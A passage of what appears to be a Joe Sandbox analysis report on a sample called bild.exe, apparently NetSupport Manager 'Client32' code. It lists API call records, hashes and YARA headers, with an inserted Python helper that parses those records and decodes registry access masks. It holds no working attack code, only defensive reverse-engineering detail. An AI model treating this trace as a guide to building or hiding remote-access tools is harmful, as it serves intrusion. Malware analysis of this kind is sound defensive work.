                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                      • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                      • API String ID: 2441568934-1875806619
                                                                                      • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                      • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                      • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                      • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnumValue$CloseOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3785232357-0
                                                                                      • Opcode ID: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                      • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                      • Opcode Fuzzy Hash: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                      • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
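The API listings in these function records all follow one fixed layout (`Name.MODULE(args), ref: address`, with a `Part of subcall function` prefix for calls reached through a callee), so they can be parsed and mined across the whole report instead of being read record by record. The Python below is an added example, not Joe Sandbox tooling. Its sample lines are copied from the registry-enumeration record and the Client32 error-exit subcall chain in this section, and it decodes the `00020019` passed as samDesired to RegOpenKeyExA as KEY_READ from the winreg.h access-right bits; the bit table, the composite-mask names and every helper function are the example's own, not anything the report defines.

```python
"""Parse Joe Sandbox function-record API lines into structured calls.
Added example, not Joe Sandbox tooling. SAMPLE_API_LINES is a constructed
subset copied from two records of this report so the script runs offline."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_API_LINES = """
• RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
• RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
• RegCloseKey.ADVAPI32(?), ref: 110612D4
• _free.LIBCMT ref: 11081417
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
"""

# One report bullet: optional subcall prefix, Name.MODULE, optional (args), ref: addr
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<subcall>[0-9A-Fa-f]+):\s*)?
        (?P<name>[A-Za-z_][\w:]*)\.(?P<module>\w+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)

# Registry access-right bits (winnt.h / winreg.h values), assumed table for decoding
KEY_RIGHTS = [
    (0x00020000, "STANDARD_RIGHTS_READ"), (0x00000001, "KEY_QUERY_VALUE"),
    (0x00000002, "KEY_SET_VALUE"), (0x00000004, "KEY_CREATE_SUB_KEY"),
    (0x00000008, "KEY_ENUMERATE_SUB_KEYS"), (0x00000010, "KEY_NOTIFY"),
    (0x00000020, "KEY_CREATE_LINK"),
]
KEY_ACCESS_NAMES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
# Position of the samDesired argument for the key open/create APIs
SAM_DESIRED_INDEX = {"RegOpenKeyExA": 3, "RegOpenKeyExW": 3, "RegCreateKeyExA": 5, "RegCreateKeyExW": 5}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # raw tokens: 8 hex digits, '?' (unresolved) or a string literal
    ref: int                 # call-site address
    subcall: Optional[str]   # caller address when reached via "Part of subcall function"

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int when Joe rendered it as 8 hex digits, else None."""
        if i >= len(self.args):
            return None
        tok = self.args[i]
        return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def parse_api_lines(text: str, strict: bool = False) -> List[ApiCall]:
    """Parse every API bullet; headers and other non-matching lines are skipped unless strict."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if not m:
            if strict:
                raise ValueError(f"unrecognised API line: {line!r}")
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("subcall")))
    return calls


def decode_reg_access(mask: int) -> List[str]:
    """Expand a samDesired mask into named bits; any bits not in the table are kept as hex."""
    names, rest = [], mask
    for bit, name in KEY_RIGHTS:
        if mask & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return names


def reg_access_name(mask: int) -> str:
    """Composite name (KEY_READ etc.) when the mask is one, else the joined bit list."""
    return KEY_ACCESS_NAMES.get(mask) or "|".join(decode_reg_access(mask))


def registry_opens(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """(call-site, access) for each key open/create; '?' when Joe did not resolve the mask."""
    out = []
    for c in calls:
        idx = SAM_DESIRED_INDEX.get(c.name)
        if idx is not None:
            mask = c.arg_int(idx)
            out.append((c.ref, reg_access_name(mask) if mask is not None else "?"))
    return out


def modules_used(calls: List[ApiCall]) -> List[str]:
    return sorted({c.module for c in calls})


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES, strict=True)
    for c in parsed:
        via = f" via {c.subcall}" if c.subcall else ""
        print(f"{c.ref:08X}{via}: {c.module}!{c.name}({', '.join(c.args)})")
    print("registry opens:", [(f"{r:08X}", a) for r, a in registry_opens(parsed)])
```

Fed the full report rather than the two sample records, `registry_opens` separates read-only enumeration like the record above (KEY_READ) from opens that request KEY_SET_VALUE or KEY_WRITE, and the `subcall` field keeps the GetLastError, wsprintfA, MessageBoxA, ExitProcess chain attributed to its shared error-exit helper instead of to every caller that reaches it.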
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0000002C,4012B9B4,?,?,00000000,00000000,?,Function_00182078,000000FF,?,1103D500,?,?,?,00000000,4012B9B4), ref: 110B325F
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D500,?,?,?,00000000,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B329F
                                                                                      • SetEvent.KERNEL32(?), ref: 110B331A
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B3321
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                      • String ID:
                                                                                      • API String ID: 3394196147-0
                                                                                      • Opcode ID: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                      • Instruction ID: 1c2cd706bfc580d94f6c8d94d17799be7df3d247d13d912ddb644fcd1bc25a9e
                                                                                      • Opcode Fuzzy Hash: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                      • Instruction Fuzzy Hash: FC310575A04B059FD315CF69C884B9AFBE4FB4C314F10866EE85AC7750EB34A854CB90
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0000002C,4012B9B4,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,4012B9B4,?,?,00000000), ref: 110B336F
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                      • SetEvent.KERNEL32(?,?,?,1103D571,?,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                      • String ID:
                                                                                      • API String ID: 3394196147-0
                                                                                      • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                      • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                      APIs
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11113252
                                                                                      • SetCursor.USER32(00000000,?,?,11120606,00000000,00000000,11124B99,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 11113259
                                                                                      • DestroyCursor.USER32(?), ref: 11113270
                                                                                      • DestroyCursor.USER32(?), ref: 1111327D
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Cursor$Destroy$Load
                                                                                      • String ID:
                                                                                      • API String ID: 3167891023-0
                                                                                      • Opcode ID: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                      • Instruction ID: a2e30b34d5d2f1c91a37dce4984a5637c3bf472293567a6a29e36ae9608199f7
                                                                                      • Opcode Fuzzy Hash: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                      • Instruction Fuzzy Hash: 5EE09B7091CB009BDB019B798CCC957F7E8BBD4711B20093DE17EC210CC735A4418B10
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                      • SetFocus.USER32(?), ref: 11007353
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                      • String ID: edit
                                                                                      • API String ID: 1305092643-2167791130
                                                                                      • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                      • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                      • _memmove.LIBCMT ref: 110092B6
                                                                                        • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                      • String ID: string too long
                                                                                      • API String ID: 2168136238-2556327735
                                                                                      • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                      • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1108F38C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1108F3A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: L
                                                                                      • API String ID: 1338273076-2909332022
                                                                                      • Opcode ID: 3896e810ab9ec8afa04ae16f69e355a36910fef65e5343e495f94c92c586995c
                                                                                      • Instruction ID: a4fae97c5fdb08f5bbe7be2be84186cb3cec15bbd065a55e87689edd9833ea14
                                                                                      • Opcode Fuzzy Hash: 3896e810ab9ec8afa04ae16f69e355a36910fef65e5343e495f94c92c586995c
                                                                                      • Instruction Fuzzy Hash: E73177B5D04259AFDB10DFA5C880BDEFBF8FB08754F04826DE915A7280D775A904CB51
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 11041413
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                      Strings
                                                                                      • VolumeControl exception : %hs, xrefs: 11041431
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: VolumeControl exception : %hs
                                                                                      • API String ID: 3728558374-910296547
                                                                                      • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                      • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1100F27B
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                        • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1100F292
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                      • String ID: string too long
                                                                                      • API String ID: 963545896-2556327735
                                                                                      • Opcode ID: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                      • Instruction ID: bb54faa7590d99a912cddc2b6cd1eeb78aa94a45d21c5f83dac251cd0972bc34
                                                                                      • Opcode Fuzzy Hash: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                      • Instruction Fuzzy Hash: EE119A377046544FE321D99CE880B6AF7E9EF956A4F20066FE59187650C7A1A84483A2
                                                                                      APIs
                                                                                      • ShowWindow.USER32(8D111939,00000009,?,?,?,?,?,?,?,?,?,?,110BA3E6,110BFEBC), ref: 110B92CB
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004C), ref: 110B8642
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004D), ref: 110B8649
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004E), ref: 110B8650
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004F), ref: 110B8657
                                                                                        • Part of subcall function 110B8610: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8666
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(?), ref: 110B8674
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(00000001), ref: 110B8683
                                                                                      • MoveWindow.USER32(8D111939,?,?,?,?,00000001), ref: 110B92F3
                                                                                      Strings
                                                                                      • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B930D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                      • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                      • API String ID: 2940908497-693965840
                                                                                      • Opcode ID: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                      • Instruction ID: ea8a17caf2cab53e8fa0eb5ee6ebbdabb1f0cf5c0d35e4c5ce58ed4944f537fe
                                                                                      • Opcode Fuzzy Hash: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                      • Instruction Fuzzy Hash: FF21EA75B0060AAFDB08DFA8C995DBEF7B5FB88304F104668E51997354DA30BD01CBA4
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • _memmove.LIBCMT ref: 11147211
                                                                                      Strings
                                                                                      • Failed to get callstack, xrefs: 111471BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess_memmove
                                                                                      • String ID: Failed to get callstack
                                                                                      • API String ID: 4135527288-766476014
                                                                                      • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                      • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(00020019,?,00000000,4012B9B4,00000000,00020019,?,00000000), ref: 110ED280
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValuewvsprintf
                                                                                      • String ID: ($Error %d getting %s
                                                                                      • API String ID: 141982866-3697087921
                                                                                      • Opcode ID: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                      • Instruction ID: 38ad67af7cf9c35c8db4f97e6700948d2d14c8bc089a0f5a48db9c7a16624884
                                                                                      • Opcode Fuzzy Hash: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                      • Instruction Fuzzy Hash: 7011A372E01118AFDB00DEA9DD45DEFB3B8EB94225F00816EF81597140DA71E914C761
                                                                                      APIs
                                                                                      • wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
